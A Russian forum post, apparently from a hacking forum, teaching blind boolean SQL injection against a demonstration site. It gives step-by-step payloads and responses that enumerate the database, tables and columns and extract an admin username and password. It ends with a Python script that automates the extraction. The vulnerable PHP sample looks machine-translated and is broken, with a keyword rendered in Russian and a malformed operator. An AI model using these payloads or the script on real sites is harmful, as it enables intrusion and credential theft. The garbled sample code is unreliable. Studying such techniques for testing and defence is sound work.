Защити свои аккаунты качественными и приватными прокси форматов IPv4 и IPv6! - Proxy-seller

Слепая Инъекция SQL

VLD

Админ

Слепая инъекция SQL используется, когда нет значения из базы данных в выводе из веб-приложения, это означает, что сервер не показывает никакой информации о базе данных, мы только можем проверить, будет ли инъекция возвращать true или false.

В этом примере скрипта сервер проверяет, существует ли id пользователя в базе данных, если id extsts он вернет 'OK', иначе вернет 'None'.

Код:
<?php
    if (isset ($_GET)) {
$id = $_GET;
$sql = "SELECT * FROM 'users' WHERE ' id ' = '$id'";
$user = mysqli_query( $con, $sql);
if (@mysqli_num_rows ($user ) > > 0) {
echo 'OK';
}
остальное {
echo 'None';
}
}
?>
Если в базе данных 10 пользователей, то вывод сайта будет:
Код:
http://www.sql-blind-injection.com/?id=1
OK
http://www.sql-blind-injection.com/?id=2
OK
http://www.sql-blind-injection.com/?id=3
OK
http://www.sql-blind-injection.com/?id=5
OK
http://www.sql-blind-injection.com/?id=10
OK
http://www.sql-blind-injection.com/?id=11
None
http://www.sql-blind-injection.com/?id=0
None
Это означает, что только id между 1 и 10 вернет true.

Использование

Сайт только вернет true или false, нам нужно использовать brute force, но совпадение всей строки занимает много времени, поэтому мы постараемся совпасть по каждому символу.

Понимание Запроса

Запрос использует целочисленное значение переменной id в GET методе, возможные запросы:
Код:
SELECT * FROM table_name WHERE id=1
SELECT * FROM table_name WHERE id='1'
SELECT * FROM table_name WHERE id="1"
SELECT * FROM table_name WHERE id=(1)
SELECT * FROM table_name WHERE id=('1')
SELECT * FROM table_name WHERE id=("1")
Если запрос сервера SELECT * FROM table_name, где id= ' 1 ' инъекция будет такой:
Код:
URL: http: / / www .sql-blind-injection .com/?i d= 1 ' и TRUE#
Injection: 1 ' AND  TRUE #
Query:  SELECT * FROM table_name WHERE' id ' =' 1 ' AND  TRUE #'
Output :  OK

URL :  http: / /www .sql-blind-injection .com/?i d= 1 ' и FALSE#
Injection: 1 ' и  FALSE #
Query:  SELECT * FROM table_name WHERE' id ' =' 1 ' AND  FALSE #'
Output :  None
Получение Базы Данных

Получение длины базы данных

С помощью функции LENGTH () можно узнать длину строки в SQL-запросе.
Код:
Injection: 1' AND (SELECT LENGTH(database()))=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(database()))=1#'
Output: None

Injection: 1' AND (SELECT LENGTH(database()))=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(database()))=2#'
Output: None

Injection: 1' AND (SELECT LENGTH(database()))=3#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(database()))=3#'
Output: None

Injection: 1' AND (SELECT LENGTH(database()))=4#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(database()))=4#'
Output: OK
Это означает, что длина базы данных составляет 4 символа.

Получение имени базы данных

Существует несколько способов получения значений каждого символа в строке. Есть несколько методов:
  • ПОДСТРОКА () & ASCII ()

    SUBSTRING () - используется для извлечения символов из строки
  • Код:
    SUBSTRING('Hacker', 1, 1)
    Return: H
    SUBSTRING('Hacker', 2, 1)
    Return: a
    SUBSTRING('Hacker', 3, 1)
    Return: c
    SUBSTRING('Hacker', 4, 1)
    Return: k
    SUBSTRING('Hacker', 5, 1)
    Return: e
    SUBSTRING('Hacker', 6, 1)
    Return: r
ASCII () - возвращает значение ASCII символа
Код:
ASCII ('a')
Возвращение: 97
Код:
// Getting first char
Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=97#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=97#'
Return: OK
// So we know that ASCII value of the first char is greater than or equal to 97 (a) so let's try another letter like 'o' (111)

Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=111#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=111#'
Return: OK
// Returns OK again so let's increase to 116 (t)

Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=116#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=116#'
Return: None
// Returns None, it means that the value must be decreased, let's try 115 (s)

Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=115#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=115#'
Return: OK
// Returns OK that means that 115 is the correct value
Теперь мы знаем, что первый символ базы данных является "s", давайте обнаружим другие символы.
Код:
// Getting second char
Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))>=97#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))>=97#'
Return: OK

Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))>=114#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))>=114#'
Return: None

Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))=113#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))=113#'
Return: OK
Второй символ - 'q' (113)

Anothers chars
Код:
// 3rd char
Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 3, 1)))=108#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 3, 1)))=108#'
Return: OK
// Third char is 'l' (108)

// 4th char
Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 4, 1)))=105#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 4, 1)))=105#'
Return: OK
// Fourth char is 'i' (105)
  • Имя базы данных - 'sqli'. Попробуем другой метод.

  • Как

    Оператор LIKE используется для поиска заданного шаблона в столбце. Можно узнать данные из строки с помощью"%". Знак " % " используется для определения подстановочных знаков (пропущенных букв).
  • Код:
    // Return OK to any database name
    Injection: 1' AND (SELECT database()) LIKE '%'#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE '%'#'
    Return: OK
    
    // Return OK if database name starts with the letter 'a'
    Injection: 1' AND (SELECT database()) LIKE 'a%'#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 'a%'#'
    Return: None
    
    // Return OK if database name starts with the letter 's'
    Injection: 1' AND (SELECT database()) LIKE 's%'#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 's%'#'
    Return: OK
    
    // Return OK if database name starts with the letters 'sq'
    Injection: 1' AND (SELECT database()) LIKE 'sq%'#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 'sq%'#'
    Return: OK
    
    // Return OK if database name starts with the letters 'sql'
    Injection: 1' AND (SELECT database()) LIKE 'sql%'#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 'sql%'#'
    Return: OK
    
    // Return OK if database name is 'sqli'
    Injection: 1' AND (SELECT database()) LIKE 'sqli'#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 'sqli'#'
    Return: OK
  • Метод LIKE не учитывает регистр, для проверки в чувствительном к регистру режиме требуется двоичный файл перед базой данных()
  • Код:
    Injection: 1' AND (SELECT database()) LIKE 'SQLI'#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 'SQLI'#'
    Return: OK
    
    Injection: 1' AND (SELECT BINARY database()) LIKE 'SQLI'#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT BINARY database()) LIKE 'SQLI'#'
    Return: None
    
    Injection: 1' AND (SELECT BINARY database()) LIKE 'sqli'#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT BINARY database()) LIKE 'sqli'#'
    Return: OK
  • Получение Таблиц

    Получение количества таблиц

    Для подсчета количества таблиц можно использовать функцию COUNT ().
  • Код:
    SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database()
  • или
  • Код:
    SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='sqli'
  • Код:
    Injection: 1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=1#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=1#'
    Return: None
    
    Injection: 1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=2#
    Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=2#'
    Return: OK
  • В базе данных есть 2 таблицы.

    Получение имен всех таблиц

    Для выбора каждой таблицы в отдельности мы будем использовать лимит.
  • Код:
    SELECT * FROM table_name LIMIT 0,1
    // Select onlyfirst table
    
    SELECT * FROM table_name LIMIT 1,1
    // Select onlysecond table
    
    SELECT * FROM table_name LIMIT 0,2
    // Selectfirst and second tables
    
    SELECT * FROM table_name LIMIT 1,2
    // Selectsecond and third tables
Получение длины имени каждой таблицы
Код:
// First table
Injection: 1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=5#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=5#'
Return: OK
// The lengh of first table name is 5

// Second table
Injection: 1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)=5#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)=5#'
Return: OK
// The lengh of second table name is 5
В этом примере метод для получения имен таблиц будет похож, но вы можете использовать SUBSTRING ().

Получение имени первой таблицы
Код:
Injection: 1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'a%'#'
Return: None
// This table name doesn't starts with 'a'

Injection: 1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'u%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'u%'#'
Return: OK
// The first  name starts with 'u' and its length  5, lets try 'users'

Injection: 1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'users'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'users'#'
Return: OK
// The first  name is 'users'
Получение имени второй таблицы
Код:
Injection: 1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1) LIKE 'a%'#'
Return: OK
// The second table name starts with 'a' and its length is 5, lets try 'admin'

Injection: 1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1) LIKE 'admin'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1) LIKE 'admin'#'
Return: OK
// The second table name is 'admin'
В таблице администратора, вероятно, есть важные данные.

Получение Столбцов

Получение количества столбцов
Код:
Injection: 1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=1#'
Return: None

Injection: 1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=2#'
Return: None

Injection: 1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=3#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=3#'
Return: OK
Таблица имеет 3 столбца.
Получение длины каждого столбца

Использование LIMIT для выбора каждой таблицы по отдельности и LENGTH() для проверки длины.

Первая колонка
Код:
Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1)=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1)=1#'
Return: None

]Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1)=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1)=2#'
Return: OK
Второй столбец
Код:
Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1)=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1)=1#'
Return: None

]Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1)=8#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1)=8#'
Return: OK
Третья колонка

Код:
Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1)=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1)=1#'
Return: None

]Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1)=8#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1)=8#'
Return: OK
Получение имени каждого столбца

Первый столбец (длина = 2)
Код:
Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'a%'#'
Return: None

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'i%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'i%'#'
Return: OK

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'id'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'id'#'
Return: OK
Второй столбец (длина = 8)
Код:
Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'a%'#'
Return: None

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'u%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'u%'#'
Return: OK

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'us%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'us%'#'
Return: OK

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'username'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'username'#'
Return: OK
Третья колонка (длина = 8)
Код:
Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'a%'#'
Return: None

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'p%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'p%'#'
Return: OK

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'pa%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'pa%'#'
Return: OK

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'password'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'password'#'
Return: OK
Получение Имени Пользователя И Пароля

База данных
  • sqli
    • пользователи
    • администратор
      • ID
      • имя пользователя:
      • пароль:

Получение длины имени пользователя

Код:
Injection: 1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=1#'
Return: None

Injection: 1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=2#'
Return: None

Injection: 1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=3#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=3#'
Return: None

Injection: 1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=4#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=4#'
Return: None

Injection: 1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=5#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=5#'
Return: OK
Получение длины пароля
Код:
Injection: 1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=1#'
Return: None

Injection: 1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=2#'
Return: None

Injection: 1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=3#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=3#'
Return: None

Injection: 1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=4#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=4#'
Return: None

Injection: 1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=8#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=8#'
Return: OK
Получение имени пользователя (length = 5)
Код:
Injection: 1' AND (SELECT username FROM admin LIMIT 1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT username FROM admin LIMIT 1) LIKE 'a%'#'
Return: OK

Injection: 1' AND (SELECT username FROM admin LIMIT 1) LIKE 'admin'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT username FROM admin LIMIT 1) LIKE 'admin'#'
Return: OK
Получение пароля (Длина = 8)
Код:
Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'a%'#'
Return: None

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p%'#'
Return: OK

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'pa%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'pa%'#'
Return: None

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p4%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p4%'#'
Return: OK

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455%'#'
Return: OK

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455word'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455word'#'
Return: None

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455w0rd'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455w0rd'#'
Return: OK
Теперь мы знаем имя пользователя / пароль для admin:
Код:
admin:p455w0rd
Дополнительный

Создание Скрипта Для Получения Значений

Этот скрипт получит имя базы данных, но возможен код для получения других значений.
Код:
import requests

url = 'http://www.sql-blind-injection.com'
keyword = 'OK'

#    Getting the length of database
for i in xrange(1, 100):
    injection = "?id=1' AND (SELECT LENGTH(database()))=" + str(i) + "%23"
    if requests.get(url + injection).content.find(keyword) != -1:
        length = i
        break

#    Getting the name of database
charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
database = ''
for n in xrange(1, length + 1):
    for c in charset:
        injection = "?id=1' AND (SELECT SUBSTRING(database(), " + str(n) + ", 1))='" + c + "'%23"
        if requests.get(url + injection).content.find(keyword) != -1:
            database += c
            break
 
Похожие темы
FRANKENSTEIN
Проверено SQLi Dumper v.9.7
Ответы
12
Просмотры
2,525
darkmen666
Ответы
0
Просмотры
388
alissakissa
Ответы
1
Просмотры
522
VLD
Ответы
0
Просмотры
436
Сверху Снизу